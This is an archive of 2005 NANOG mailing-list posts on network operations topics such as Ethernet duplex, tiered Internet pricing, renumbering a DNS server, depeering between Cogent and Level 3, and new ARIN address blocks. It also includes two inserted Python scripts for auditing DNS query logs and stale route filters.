Thus spake [EMAIL PROTECTED] On Wed, Dec 21, 2005 at 11:36:00PM +0100, Daniel Roesen wrote: Last time I checked, Ethernet is still CSMA/CD. Ok, sure, half-duplex. People using auto-neg. Only if you're running half-duplex, which is generally an error condition in modern networks. And inter(frame)gap delay. http://www.merit.edu/mail.archives/nanog/1997-11/msg00189.html This is why, IIRC, rs would have to wake up and go down to the MAE and reboot the giggle switch. -M
RE: Addressing versus Routing (Was: Deploying IPv6 in a datacenter)
Woops. This is the URL I meant to preface the comment with: http://www.google.com/search?hl=enlr=oi=defmoredefl=enq=define:Interframe+gap -M
Re: #nanog: was Re: http://weblog.disgu.st down
Daniel - it should be public IMO only because you don't want some lesser experienced operators wandering into these IRC brothels and catching something or worse, giving them something...so to speak. I can wander into any chat really and say I'm vaul pixie and make you do bad things potentially, like make you buy a CB and contact me on 'secure' Channel 19 with your name server password so I can 'help'. That's 'bad', yes yes, digital certs, pgp, etc. All that. I wouldn't cry if IRC was deprecated, or archie, or gopher, but..that'll never happen so better to use education as the 'jimmy hat'. -Original Message- From: Daniel Roesen [mailto:[EMAIL PROTECTED]] Sent: Wed Dec 21 21:50:27 2005 To: nanog list Subject: Re: #nanog: was Re: http://weblog.disgu.st down On Thu, Dec 22, 2005 at 04:06:02AM +0200, Gadi Evron wrote: I'd like to see a useful #nanog where network operators could chat. That channel does exist but is not NANOG-related. Some #nanog folks who do want to finally chat on-topic hang out there. Quote from one of them: dude, this is prolly the most on topic IRC channel I was ever in. :-) Fortunately, even with currently almost 200 folks in it, there is enough self discipline to stay mostly on topic. It looked more like an 3l33t hax0rs channel to me when I visited. You are certainly talking about a different channel than me. The one I was talking about (and that should have been a private reply, not a reply to the list) isn't named #nanog. Anyway, apologies to stir this discussion, it should have been off-list anyway. :-Z Best regards, Daniel -- CLUE-RIPE -- Jabber: [EMAIL PROTECTED] -- [EMAIL PROTECTED] -- PGP: 0xA85C8AA0
RE: who's receiving comvalid/bgpsentinel spam? (Re: BGP )
# you're not the only one... do you think it's worth complaining, or is this another hey, you put your contact information out there, we're just using it, and the mail isn't spam, it's absolutely on-topic? spammer? In my experience, these are being originated from here i.e. that poster is a subscriber here and he is harvesting from here. I'll be shopping at the Burlington Mall late this afternoon. Their office is directly next door, on the way to Starbucks. I'll pop over and see if they have a valid postal address (fraudulent domain complaint) and perhaps I will pop in and ask who is in charge of The Annoying Spam Department and request removal in person. -M
RE: Two Tiered Internet
[ SNIP ] This is not directed at Sean, but please -- as a former Cisco engineering flunky, I can distinguish between marketing fluff (even when disguised as a 'case study') and real figures, and the truth is, there are no figures, because there is dismal adoption of the services. Go figure. Whatever. Sean recently joined Cisco marketing hence the quoting of vendor cruft as policy. It would be nice to fess up to that with an @cisco or at least an I work for Cisco Marketing disclaimer. -M
RE: monitoring Huawei routers with Cacti.
Fellow Nanogers, In one of our WAN circuits we have a Huawei Quidway router. Has anyone developed a Cacti template for monitoring that kind of device? Configuring it to be seen as a Cisco router doesn't work. Abraços, Marlon Borba, CISSP. http://forums.cacti.net/about9702.htmlhighlight=huawei You could also drop a number off the snmp OID string and see what is being returned for values you can poll. At least you should be able to. -M
RE: The Qos PipeDream [Was: RE: Two Tiered Internet]
Randy- I don't think your bank analogy is very strong, but never mind that. I agree with what you're saying in principle, that if a user/customer buys bit delivery at a fixed rate then we should deliver it. But isn't that the point. You can't guarantee delivery, just as you can't guarantee you won't get a busy signal when you make a call. -M
RE: Let's talk about ICANN
(b) Would that prevent discussion here? ;-) This is a trick question, right?
RE: Two Tiered Internet
--- Joe McGuckin [EMAIL PROTECTED] wrote: What good is 6Mbit DSL from my ISP (say, SBC for example) if only a small portion of the net (sites that pay for non-degraded access) loads at a reasonable speed and everything else sucks? There are two possible ways of having a tiered system - one is to degrade competitors/those who don't pay, and the other is to offer a premium service to those who do pay. Would your perception of those two scenarios be identical? Since the model is based around cash, there is no perception except you pay, you get priority. Someone has to pay for the Internet. The users aren't. -M
RE: Two Tiered Internet
On Wed, Dec 14, 2005 at 04:59:44AM -0500, Hannigan, Martin wrote: Since the model is based around cash, there is no perception except you pay, you get priority. Someone has to pay for the Internet. The users aren't. hum... then what am i getting for my monthly 4000+ bills from telcos and ISPs for data services and internet transit services? You don't get priority. :-) -M
RE: Gothcas of changing the IP Address of an Authoritative DNS Server
On 14-Dec-05, at 10:02 AM, Joe Abley wrote: You also want to check all the registries which are superordinate to zones your server is authoritative for, and check that any IP addresses stored in those registries for your nameserver are updated, otherwise you will experience either immediate or future glue madness. A conservative approach to this kind of transition is to arrange for your nameserver (or different nameservers hosting the same data) to respond on both the old and new addresses, and to continue in that mode until you see no queries directed at the old address for some safe-seeming interval (bearing in mind TTLs and cached records, alluded to by Steven and Sam). If you have access customers (Dial/Broadband/etc) make sure they know the IP for your DNS server is changing in case they hardcode IP of your DNS server into their PCs. It might be wise to keep the old addrs as host routes on interface aliases on the same machine for simplicity's sake. (Joe said that kinda). Both unix and cisco support this. You will likely not miss a beat if you're able to do this and see who's using the old addrs(hard coded) after the TTL expires - methinks. If you really care, you could chase down your hard coded users or just shut down and force them to call. The number would dictate which one I suppose. -M
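The cut-over check described in the message above (answer on both addresses, then see who still queries the old one after the TTL expires), as an added example that is not part of the thread. The log lines are constructed in the style of BIND 9 query logging, which ends each entry with the local address the query arrived on; the addresses, the 86400-second maximum TTL, the 2x quiet-period margin and all function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

OLD_ADDR = "192.0.2.53"              # assumption: nameserver address being retired
MAX_TTL = 86400                      # assumption: longest TTL on NS/A/glue, seconds
CUTOVER = datetime(2005, 12, 13, 9, 0, 0)  # assumption: when delegations changed

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
13-Dec-2005 09:15:02.101 client 203.0.113.10#41022 (example.net): query: example.net IN A +E (192.0.2.53)
13-Dec-2005 09:15:03.420 client 203.0.113.11#41023 (example.net): query: example.net IN NS + (198.51.100.53)
14-Dec-2005 08:59:00.007 client 203.0.113.10#41900 (example.net): query: example.net IN A +E (192.0.2.53)
14-Dec-2005 12:30:44.310 client 203.0.113.77#50001 (www.example.net): query: www.example.net IN A + (192.0.2.53)
15-Dec-2005 07:01:09.455 client @0x7f3c2c0a1230 203.0.113.77#50112 (www.example.net): query: www.example.net IN A + (192.0.2.53)
15-Dec-2005 07:02:00.000 client 203.0.113.11#41500 (example.net): query: example.net IN MX +E (198.51.100.53)
15-Dec-2005 07:03:00.000 general: info: zone example.net/IN: loaded serial 2005121501
"""

MONTHS = {m: i for i, m in enumerate(
    ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
     "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], start=1)}

LINE_RE = re.compile(
    r"^(?P<day>\d{2})-(?P<mon>[A-Za-z]{3})-(?P<year>\d{4}) "
    r"(?P<time>\d{2}:\d{2}:\d{2})\.\d+ "
    r"client (?:@0x[0-9a-fA-F]+ )?(?P<client>[0-9a-fA-F.:]+)#\d+ "
    r"\([^)]*\): query: \S+ \S+ \S+ \S+ "
    r"\((?P<local>[0-9a-fA-F.:]+)\)\s*$"
)


def parse_line(line):
    """Return (timestamp, client_ip, local_ip) or None for non-query lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    month = MONTHS.get(m["mon"].title())
    if month is None:
        return None
    hour, minute, second = (int(x) for x in m["time"].split(":"))
    ts = datetime(int(m["year"]), month, int(m["day"]), hour, minute, second)
    return ts, m["client"], m["local"]


def audit_old_address(log_text, old_addr, cutover, max_ttl):
    """Summarise queries that still arrive on the retired address.

    Queries seen before cutover + max_ttl can be explained by cached
    records. Clients seen after that deadline are likely hard-coded.
    """
    ttl_deadline = cutover + timedelta(seconds=max_ttl)
    last_seen = None
    stragglers = defaultdict(int)
    skipped = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            skipped += 1          # not a query-log entry; count, do not guess
            continue
        ts, client, local = rec
        if local != old_addr:
            continue
        if last_seen is None or ts > last_seen:
            last_seen = ts
        if ts > ttl_deadline:
            stragglers[client] += 1
    return {"last_seen": last_seen,
            "stragglers": dict(stragglers),
            "skipped": skipped}


def safe_to_retire(last_seen, now, max_ttl, margin=2):
    """True once the old address has been silent for margin * max_ttl."""
    if last_seen is None:
        return True
    return now - last_seen >= timedelta(seconds=margin * max_ttl)


if __name__ == "__main__":
    report = audit_old_address(SAMPLE_LOG, OLD_ADDR, CUTOVER, MAX_TTL)
    print("last query on old address:", report["last_seen"])
    for client, hits in sorted(report["stragglers"].items()):
        print(f"still using old address after TTL expiry: {client} ({hits} queries)")
    print("safe to retire now:",
          safe_to_retire(report["last_seen"], datetime(2005, 12, 15, 12, 0), MAX_TTL))
```

Run against a real query log, the straggler list is the set of users to chase down before the old address is withdrawn.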
RE: Two Tiered Internet
but do i get the Internet? ... your claim is that No, my claim is that users are not paying the full boat. Almost all the telecoms are still in trouble in one way or another, interest expense, billions $$ in bonds coming due ~2008, etc. They aren't making enough money. That may be a market forces reality, but that doesn't mean the services aren't under priced. and as others have cleverly pointed out, what i really am buying is full employment for the AP departments of telco/isps. :) You're paying pensions for bankruptcy court employees in perpetuity and Michael Moore documentaries. :) I think the better questions for this thread may be: 1. Why NOT charge for priority access and transit 2. Is it inequitable to anyone, and why? 3. If there is an inequity, does it really matter?
RE: Two Tiered Internet
What I'm interested in is how the two service providers will build a two tiered Internet. The PSTN is tiered both in architecture and operation. Switching hierarchies and a separate SS7 network which is basically a billing network. I think the thought is service levels vs. congestion control. For example, CO's have call overflow mechanisms to tandem switch points which basically seek out excess capacity and use it as overflow for call termination if and when possible. I could see an internet hierarchy where preferred traffic was switched onto hicap overflow links with controlled congestion and other traffic, non premium traffic, got a fast busy. -M
RE: The Qos PipeDream [Was: RE: Two Tiered Internet]
Hey there Fergie: Martin, You can 'see' anything you'd like, but your reality does not match everyone else's -- my opinion, of course. QoS is a myth -- it doesn't exist. What you're obviously trying to tell us is that less-than-best- effort is somehow good? Never sell it. This vein will come back and bite you guys who think like this. I'm not suggesting that this be the way the Internet operate at all. The poster asked how this would work if it did (my interpretation) and where there is will (customers) and money (ISP's) there is always a way. The old school in me says never!, but the experience in me says possible. I think it *is* unlikely though. Consider the busy signal approach for a second though. Can we build, pay for, and sustain an Internet that never has congestion or is never busy. If you have a web server and a limited amount of memory or net you tune down the number of httpd's that are spawned and when they are all busy, your site doesn't answer and you get a 404. That's akin to a busy signal and is already in practice today. If I'm Google, for example, I buy thousands of servers so this does not happen. If I'm just plain old me and I am running some popular faq on my personal site, I accept the 404's because I am not going to pay for 100% performance. They can try again later, or, I can pay for more memory or more network to insure optimal performance. Hope that makes a little more sense. And let me turn the question around to you. If the Internet were to work like this, how would we do it? - ferg -- Hannigan, Martin [EMAIL PROTECTED] wrote: What I'm interested in is how the two service providers will build a two tiered Internet. The PSTN is tiered both in architecture and operation. Switching hierarchies and a separate SS7 network which is basically a billing network. I think the thought is service levels vs. congestion control. 
For example, CO's have call overflow mechanisms to tandem switch points which basically seek out excess capacity and use it as overflow for call termination if and when possible. I could see an internet hierarchy where preferred traffic was switched onto hicap overflow links with controlled congestion and other traffic, non premium traffic, got a fast busy. -M -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet [EMAIL PROTECTED] or [EMAIL PROTECTED] ferg's tech blog: http://fergdawg.blogspot.com/
RE: Let's talk about ICANN
I'm surprised that I've yet to see any mention here on NANOG about the Internet Governance Forum discussions that were held at the WSIS / United Nations summit in Tunisia a few weeks ago. From my reading of the various articles, it appears that the EU together with some developing nations wanted to wrest control of the Internet away from the US and ICANN. Was everyone unaware of this, or were you just counting on Vint Cerf to talk sense into the delegates from the other countries? http://news.com.com/U.N.+says+its+plans+are+misunderstood/2008-1028_3-5959117.html Then there was ICANN's sudden delay of discussion/approval of .xxx: http://news.google.com/news?q=icann+xxx followed by their approval of .asia: http://news.google.com/news?q=icann+asia Is anyone here paying any attention to any of this? jc I'm on the 2006-2009 NRO Address Supporting Organization Advisory Council (www.nro.com) (www.aso.icann.org) and was at the Vancouver meeting. There were quite a few people from the NANOG community at the ICANN meeting in Vancouver. I would think that ICANN is off topic for NANOG? -M
RE: Someone from nic.net registrar please contact me off-list
Thanks Evaldo Gardenali You know, if people are going to post here as a paging service, it would be nice to put some indication as to why - perhaps the rest of us can assist more quickly? 9 times out of 10 we can since it's usually operator/user error and not necessarily the providers issue. At least that's my experience with $doofus to the white lobby phone. YMMV. -M
RE: paypal down!
On Tue, 15 Nov 2005, Steven Kalcevich wrote: www.paypal.com Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [EMAIL PROTECTED] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Works for me. Same BS splash advertising that always comes up. Damn that is annoying. Yes, but it *is* up. Same here. Probably one of the rotation web servers had an issue or something minor. -M
RE: STILL Paging Google...
Still no word from google, or indication that there's anything wrong with the robots.txt. Google's estimated hit count is going slightly up, instead of way down. Why am I bugging NANOG with this? Well, I'm sure if Googlebot keeps ignoring my robots.txt file, thereby hammering the server and facilitating spam, they're doing the same with a google other sites. (Well, ok, not a google, but you get my point.) Why would they read/respond on NANOG to an application problem? (seriously) -M
RE: paypal down!
On Nov 15, 2005, at 9:45 PM, Hannigan, Martin wrote: www.paypal.com Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [EMAIL PROTECTED] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Works for me. Same BS splash advertising that always comes up. Damn that is annoying. Yes, but it *is* up. Same here. Probably one of the rotation web servers had an issue or something minor. Or there's a chance that you've got a trojan/malware install on the computer. No chance. Do you have the attributions wrong here? Even your own website says that 404's are 70% burp-factor - which I would tend to agree with for the most part. Not enough httpd spurned, reloads, bad pages, etc. http://www.404lab.com/404/yikes.asp And oddly enough, no mention of the possibility of malware. Time to update. :-) -M
RE: paypal down!
Or there's a chance that you've got a trojan/malware install on the computer. Slight correction to my earlier post - just to be clear. Not just 404's, failed pages in general. My failure scenarios were wider than 404. -M
RE: Networking Pearl Harbor in the Making
On Mon, Nov 07, 2005 at 06:43:35AM -0500, J. Oquendo wrote: the center of the information security vortex. Because IOS controls the routers that underpin most business networks as well as the Internet, I think in general this is an argument against converged networks, the added complexity and outages may not be worth the gains.. Convergence isn't going away because Networld Week thinks routers are insecure (no, really?). It's an argument for vendor diversity. -M
RE: Networking Pearl Harbor in the Making
On Monday 07 Nov 2005 3:42 pm, Hannigan, Martin wrote: It's an argument for vendor diversity. No it is an argument for code base diversity (or better software engineering). Vendor diversity doesn't necessarily give you this, and you can get this with one vendor. How so? Haven't we recently seen an across the board bug in multiple versions of $vendor code? Vendor diversity might be a good idea, but for other reasons. Sure. There are more reasons than one to do it. I was specifically pointing out that code diversity is a good one - and not forgetting associated cost and economic impacts as mentioned in a later followup. -M
RE: Using BGP to force inbound and outbound routing through particular routes
What's the netblock and ASN you already have? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Edward W. Ray Sent: Wednesday, November 02, 2005 2:50 PM To: nanog@merit.edu Subject: Using BGP to force inbound and outbound routing through particular routes spam was a lousy name... -Original Message- From: spam [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 02, 2005 11:44 AM To: 'nanog@merit.edu' Subject: FW: Using BGP to force inbound and outbound routing through particular routes I recently made a request to get a cable modem connection at my home. I went for one of those $29.95 for three month specials in case I run afoul of some rules prohibiting what I am going to do. I already have a multi-T1 connection with a Class C block and BGP running on my Cisco 3640 router, and was looking to become multi-homed. The cable connection is via bridge/DHCP cable modem, and was going to hook it up to the Cisco 3640. I have already done the research and know from what block of IP addresses I will be assigned, and the BGP route tables/peers. I would like to use BGP to force inbound and outbound routing only through particular peers, Sprint (AS 1239) and UUNET (AS 701). I have been reading Practical BGP by White, McPherson and Sangli and this appears to be possible. However, do my adjacent routers need to support BGP in order for this to work? Could I use other routing protocols to accomplish this, or would this require knowledge of all possible downstream router IP addresses? Edward W. Ray
RE: IPv6 news
No. Within a region. Normally area codes are a region. Sometimes entire country codes are a region in this sense. Depends on the size of the region/country though. In some cases there is even more than one area code for the same region. LATA's are geographic areas and NPX(prefix) are switching areas within the LATA(Local Access and Transport Area). The geo regions(LATA) are set up to differentiate local and long distance inside the US. There's a three level hierarchy within each LATA, and there are three levels in the United States as defined by the regulators, post divestiture. I'd have to say your definition may be accurate outside the US, but not inside. [ SNIP ] The telco peering points is just a technicality. It's there just for optimization. Most regulators have set up an easy interconnection policy to prevent your favorite incumbent from offering 'peering' only on lands end. They're more than a technicality. They are required by the regulator. There are commodity markets related to IXC minutes exchange as well. This helps to keep LD cheap (as it can be) and reliable as if one carrier is unable to carry minutes, others can. The basic telco architecture in the USA is EO, TO, and AT. In the case of LD, it's EO, TO, to a POP, and IXC. EO, TO and AT are all interconnected some symmetrically, some asymmetrically, with the exception of the IXC which is all symmetric. Personally, this is a very interesting thread to me, but I think this is starting to go way off topic for NANOG. -M
RE: Verizon outage in Southern California?
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Tuesday, October 18, 2005 3:13 PM Telephone service is beginning to be restored in the Long Beach area but is still sporadic. Our ATM WAN link through Sprint came back up around 1345 Central time, and the two DS1s for the school's Internet service were revived about fifteen minutes ago (1507 CDT). They've been rock-solid so something must be going right out there. When I called Sprint about any information they might have for the outage the tech said that the area was down due to a Verizon DACS failure. That must have been a spectacular failure, because I'm reading that it wiped out most everything ( http://www2.presstelegram.com/news/ci_3128087 indicates four tandems hit?! ) in the area. The articles are primarily focusing on the impact to E911 services, followed with the hit to POTS lines. I have yet to see any mention of impact to data in any of 'em. Here's what intrigues me about this outage: if it wiped out E911, most of the POTS and also impacted data services (as Jay Hannigan and I can attest), how did the cell towers that are also served by the network live through it? The dependency between all of those would be a DACS so that seems to make sense. I'm guessing the impacted circuits were DS3 or below, with Verizon providing resale of the Z ends. I'm not sure of the relation to E911 though. Could be, but it sounds odd since E911 has redundancies to tandems IIRC. My guess is water on a DACS bay or complete power loss in the CO (rarer than water on a DACS). -M
FW: Verizon outage in Southern California?
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Tuesday, October 18, 2005 3:13 PM I'm not completely familiar with the telco jargon. Does Tandem mean the same as a local central office, where POTS lines terminate at the switch? Long Beach has a population of 470,000. The C/Os I know of are: A tandem office is a CO primarily used as an aggregated switch point between local CO's. Think interconnection of local CO's or long haul tandems. Alamitos at 7th Street and Termino, ZIP 90814 Clark near Clark Ave and Pacific Coast Highway, ZIP 90804 LongBeach at 6th Street and Elm Ave, ZIP 90802 Lakewood at Clark Ave and Connant St, ZIP 90808 LNBHCAXG at 3440 California Ave, ZIP 90807 (for my home) That's the building CLLI, the switch is LNBCHAXGDS0. This one is a 5ESS and serves 12 exchanges. 562-290 562-424 562-426 562-427 562-490 562-492 562-595 562-933 562-981 562-988 562-989 562-997 I see 7 5ESS and 1 Nortel SLC DMS 10, possibly a remote to a campus or something, in Long Beach. 507 E LEW is holding the most switching gear is likely a tandem. Um, I think this is the tandem code, PNTCMIMN50T, and it's servicing about 20 areas. I have no idea whether cell service was truly affected. The announcements we sent to our campus suggested people use their cell phones for 911 service which would be serviced by the CA Highway Patrol (Erik Estrada, etc.) or a campus telephone which is serviced by our local campus police (sworn state police). I was completely unaware of the outage until someone else mentioned it in my office. If you know of an NPA-NXX of a cell phone that was impacted, send it privately and I'll tell you what CO it terminates in.
RE: SONET MUX
Hello, We are looking for a OC3 - 3xDS3 MUX. (If it can grow up to a OC12 - 12xDS3 that's a plus) Sonet side will be 1+1 protected I have looked at the following equipment is there any other sonet muxes that i should look at? Adtran Opti-3 Adtran OPTI-6100 Cisco ONS 15310, 15327 Fujitsu Flashwave 4010, 4100, 4300 Fujitsu FLM 150 The difference between Fuji and Cisco is the backplane architecture. The former is redundant and is a five nines solution. The latter is not and is a four nines solution. You will find the cisco device cheaper to buy and operate. The cisco is also less RU and less power. If you haven't already lighted your own dark fiber network, there's a lot to know at layer 1 to be sure you get the redundancy you're looking for in layer 3. Have you considered leasing circuits from a LEC or buying a wavelength managed service? -M
RE: Operational impact of depeering
-- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Tom Vest Sent: Monday, October 10, 2005 9:46 AM To: Nanog Mailing list Cc: [EMAIL PROTECTED] Subject: Re: Operational impact of depeering On Oct 10, 2005, at 9:28 AM, [EMAIL PROTECTED] wrote: It would be great if we could shift focus and think about the operations impact of depeering vs. just the political and/or contractual ramifications. Have there been any proposals put forth to the NANOG PC to review this highly visible depeering at the NANOG meeting this month? Aside from anything else, there is this interesting topic on the agenda: Abstract: NetFlow-based Traffic Analysis Techniques for Peering Networks Richard Steenbergen, nLayer Communications, and Nathan Patrick, Sonic.net Seems to me that a discussion of traffic analysis could handle a slide or two on actual impacts of this depeering. --Michael Dillon Here's one way of looking at it: (copied below b/c the list is not publicly archived) TV From: Tom Vest [EMAIL PROTECTED] Date: October 8, 2005 6:00:32 PM EDT To: Telecom Regulation the Internet CYBERTELECOM- [EMAIL PROTECTED] Subject: Re: [CYBERTEL] [ misc fyi ] internet peering breaking down (fwd) Okay now that the flap is over and I have a few minutes to spare, I'll bite. On Oct 6, 2005, at 10:34 AM, Peter R. wrote: Your passionate response deserves a response: It's not very small indeed. Compared to what? On 10/1/05, Cogent's network (AS174 -- a very old network) originated the equivalent of 1x /8 + 1x /9 -- that's 1.67% of the ends that constitute the global end-to-end network that we call the Internet. Same day/time, Level3's network (AS3356) originated the equivalent 2x /8 + 1x /9 -- or total Internet production 3.05% at that point in time. 
Note: numbers are derived from the Route Views archive: http://archive.routeviews.org/oix-route-views/2005.10/oix-full-snapshot-2005-10-01-.dat.bz2. In an RFC 1930/2270 compliant world, 99% of networks downstream of either disputant have other, unaffected upstreams, so presumably they don't lose reachability to anyone. Maybe there are 1b Internet users worldwide, and maybe they are distributed roughly in proportion to the distribution of Internet production. So maybe 5% of the world population was affected by the dispute -- roughly 5m users. Anti-Level(3)? The only fact in this was the route view count, and even that could be wrong. Not a very fair comparison, especially to make to regulatory people who may not know better. AS 174 was old when it was PSI. It's now Cogent's ASN via acquisition. You fairly imply that Cogent is as old as PSI in garnering sympathy for them being old school. Cogent is not old school. -M
RE: Cogent move without renumbering
Is it reasonable to think that numerous /24's from L3's IP space could be reassigned elsewhere without causing significant trouble for L3 and others? Even if it could work, what would be the justification for taking L3's property? Depending upon the circumstance, yes: http://www.cctec.com/maillists/nanog/current/msg01880.html
RE: Cogent move without renumbering
On Fri, 7 Oct 2005, Hannigan, Martin wrote: Is it reasonable to think that numerous /24's from L3's IP space could be reassigned elsewhere without causing significant trouble for L3 and others? Even if it could work, what would be the justification for taking L3's property? Depending upon the circumstance, yes: http://www.cctec.com/maillists/nanog/current/msg01880.html I think that is not entirely correct comparison. Original poster did not say that the current L3 customers would entirely leave L3, but that he asked if they could do something to get other type of connectivity if they have L3 ip space. The answer is that if they have /24 or longer and have router then they can turn on BGP and announce that /24 both to L3 and to another ISP and in this way have full connectivity. This would not be an attempt to take ip space away from L3. But this is not something they could do within couple days if they do not run BGP and do not have ASN (takes at least a week to get it from ARIN). For a minute there, I thought you might be right since I'm browsing for clue factor and may have missed something, but, it appears you are inaccurate in this as the poster did say: --QUOTE If a single-homed network moves from L3 to Cogent, how would they benefit? Would they not still be cut off from a significant percentage of the Internet? Is it reasonable to think that numerous /24's from L3's IP space could be reassigned elsewhere without causing significant trouble for L3 and others? Even if it could work, what would be the justification for taking L3's property? --END QUOTE That quote is asking if someone can take Level(3)'s PA space assigned with them to another provider's network. The answer is yes, it's possible. IANAL
RE: Cogent move without renumbering
[EMAIL PROTECTED] (Charles Cala) wrote: Q can an end user take non portable ip's with them to another service provider? What in non portable did you not understand? Elmar. Court orders from United States Courts to United States business regarding IP addresses issued by United States RIR's? -M
RE: Cogent/Level 3 depeering
Now Cogent is also offering free transit for single-homed L3 customers to spite L3 after depeering - majority of such single-homed transit customers are in fact these dsl/dialup ISPs Cogent is after which is why they were willing to make this offer ... Didn't the free peering offer happen _yesterday_ as a result of the disengagement? It's a tactic. Tomorrow, Level(3) could come out with the same. It's not sustainable by either. Nothing is free. We all know this. Now with 0 transit cost and 0 equipment cost (mostly old dialup equipment loans for which have by now been paid for) You mean amortization? Yes, it's about that. They deployed most of the dial gear in 98, 99. I'm sure augmentations happened after that. Anyhow. What you don't understand is the architecture sans TDM switching, ala SS7 bypass. That's what makes the $5 nut a reality. its no wonder dialup providers are able to offer it at $5/mo if somebody else takes care of the customer support billing ... That's what the other $1 to $10 dollars the retailers are charging is for, William. -M
RE: Cogent/Level 3 depeering
Just curious - Has this activity impacted voice services for anyone, and/or has either opened a FCC NORS report? Why could you open a NORS unless it's impacting LD and meet-me minutes? :-) -M
RE: Cogent/Level 3 depeering
At 10:46 PM 10/5/2005, you wrote: ok, vijay popping up is not totally surprising, but twice? dorian was a bit of a surprise. but you, joe? coming out of the woodwork? the lack of clue in this thread must be *really* painful. It's pretty evident that this has been a clue-free thread... Welcome to the thread. -M
RE: Cogent/Level 3 depeering
= The dialup case results in a very large number of users of a large number of ISPs being single-homed to one or the other of these outfits. Keep that in mind too when you next sign a contract for wholesale dialup service. Dialup costs are $5 a month or less wholesale. What do you expect? -M
RE: Cogent/Level 3 depeering
You say that as if the only move to be made is on Cogent's side. What about L3? If every L3 customer complained to L3, demanded service credits, claimed the contract was in default, and swore to never buy from L3 again, maybe L3 would budge instead. How is this relevant again? What IX's do you peer at? -M
RE: Turkey has switched Root-Servers
do you still think that Paul Vixie has given very good arguments?, peter? Merchandising, merchandising, where the real money from the movie is made. Spaceballs the T-shirt. Spaceballs the lunchbox. Spaceballs the coloring book. Spaceballs... the flamethrower! Kids love it. And my favorite, Spaceballs the Doll -- me! -M
RE: Anyone seen 172.15/16 lately?
But that doesn't answer the question: (;)) NetRange: 172.16.0.0 - 172.31.255.255 CIDR: 172.16.0.0/12 NetName:IANA-BBLK-RESERVED That's the reserved range, he's looking for the /16 before that. Isn't 172.15/16 legacy Sun example space pre 1918? It's all over CCO and Sunsolve in examples and defaults. -M
RE: [fergie-spew] RE: FW: Crews Survey Rita's Damages
[ SNIP ] The issue you decided to comment on was a one-line rider about the excessive heat in central Texas today. I trimmed the post down to the bottom. There's nothing to read into. While the latter may have well been off-topic I don't disagree that a run of the mill news story is on topic. It's the large off topic threads that historically have followed your blog and news posts. Windows filters aren't the most reliable beyond a simple tag to home in on. Thanks for the tag. My windows machine and I appreciate it! -M
RE: [afnog] ARIN to allocate from 74/8 75/8
Hi, NANOGers. ] due to filtering issues at the hosting provider of the cymru ] pingable, the data plane story is not as sanguine. i am told ] it will not be fixed until the weekend. That's not quite correct. :) One of our transit providers had some outdated filters We all have change management windows. This type of work would progress via these processes that we each have. In many cases, there are more than one CM process something like this would have to traverse. [EMAIL PROTECTED] said: ARIN will begin allocating IP address space from 74.0.0.0 /8 and 75.0.0.0 /8 within the next 2 weeks. ARIN was issued 74 /8, 75 /8, and 76 /8 by the IANA on June 17, 2005. If this isn't just a pingable address with the resolutions left to all of us, this is not enough time for testing. -M
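The "outdated filters" problem in the exchange above can be checked mechanically: compare a deny list against the blocks the quoted announcement says were issued (74/8, 75/8, 76/8). This is an added example, not part of the original messages; the sample filter entries and the function names are constructed for illustration.

```python
import ipaddress

# Blocks the quoted ARIN announcement says IANA issued on June 17, 2005.
ISSUED = [ipaddress.ip_network(p) for p in ("74.0.0.0/8", "75.0.0.0/8", "76.0.0.0/8")]

# Constructed sample of an "unallocated space" deny list on a border router.
SAMPLE_FILTER = [
    "0.0.0.0/8",
    "10.0.0.0/8",
    "74.0.0.0/7",      # aggregate covering 74/8 and 75/8
    "76.0.0.0/6",      # aggregate covering 76/8 through 79/8
    "172.16.0.0/12",
    "192.168.0.0/16",
]


def carve(entry, issued):
    """Return the parts of `entry` left after removing every issued block."""
    remaining = [entry]
    for blk in issued:
        nxt = []
        for net in remaining:
            if not net.overlaps(blk):
                nxt.append(net)                        # untouched by this block
            elif net.subnet_of(blk):
                continue                               # entirely inside issued space
            else:
                # CIDR blocks that overlap are nested, so blk sits inside net here.
                nxt.extend(net.address_exclude(blk))
        remaining = nxt
    return sorted(remaining)


def audit(filter_prefixes, issued=ISSUED):
    """Map each stale filter entry to the prefixes that should replace it.

    An empty replacement list means the entry should simply be deleted.
    """
    findings = {}
    for text in filter_prefixes:
        entry = ipaddress.ip_network(text)
        if any(entry.overlaps(blk) for blk in issued):
            findings[text] = [str(n) for n in carve(entry, issued)]
    return findings


if __name__ == "__main__":
    for entry, keep in audit(SAMPLE_FILTER).items():
        action = "replace with " + ", ".join(keep) if keep else "delete"
        print(f"stale filter {entry}: {action}")
```
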
RE: [afnog] ARIN to allocate from 74/8 75/8
i.e. is there a pingable address in each, as has been discussed here just a few times? ping is ok, but routing table entry existence seems better. ping can fail for lots of reasons and what we're really testing is routing, not icmp end-to-end, right? There's a difference between reachability and routability. The lack of a routing table entry indicates a different problem which implicates routing and reachability problems. I don't agree that reachability is implied with routability. if it's useful, i'd be happy to report what percentage of my peers have/don't have routes to these prefixes. I'd be interested. Best, -M
RE: Don't Cache that check
Somewhere, there's a shepherd listening for your cries of Wolf... -doug Shouldn't a provider know their cache servers are STORING copyrights. You demonstrate why companies need lawyers. And why this list isn't called The Lawyers Operator Group. Did Vint mark you yet? -M
RE: Calling all NANOG'ers - idea for national hardware price quote registry
